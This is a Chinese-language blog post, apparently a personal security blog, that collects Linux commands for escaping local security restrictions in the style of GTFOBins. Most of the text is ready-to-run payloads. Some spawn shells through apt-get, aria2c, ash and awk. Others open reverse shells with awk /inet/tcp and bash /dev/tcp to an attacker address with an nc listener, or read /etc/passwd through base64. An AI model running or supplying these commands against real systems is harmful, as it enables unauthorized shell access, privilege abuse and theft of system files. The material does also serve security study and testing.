Linux绕过本地安全策略防御

  1. 前言
  2. 正文

前言

This is Linux绕过本地安全策略….

music:

正文

apt-get 获取shell

apt-get changelog apt
`

i59qzD.png
i59XsH.png

aria2c
执行命令:

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
aria2c --on-download-error=$TF http://x

ash
获取shell

ash

i5PaHs.md.png
写入文件

export LFILE="1.txt"
ash -c 'echo haq5201314 > $FILE'

i5Ps3T.png

awk
获取shell

awk 'BEGIN {system("/bin/sh")}'

i5e5ct.png
反弹shell

 awk 'BEGIN{s="/inet/tcp/0/192.168.89.136/4444";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

受害机上执行
i5mEC9.png
攻击者上执行
nc -lvp 4444
i5mV3R.png

base64读取文件

LFILE="/etc/passwd"
base64 "$LFILE" | base64 --decode

i5mZg1.png

bash反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.89.136/12345 0>&1'

i5muDK.png

nc -lvp 12345

i5mKHO.png

详细文章请看:busybox | GTFOBins
你想要反的shell:关于Shell你想知道的都在这儿 - FreeBuf互联网安全新媒体平台

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Linux绕过本地安全策略防御

本文作者:九世

发布时间:2018-11-03, 23:32:40

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/49ae8f0.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录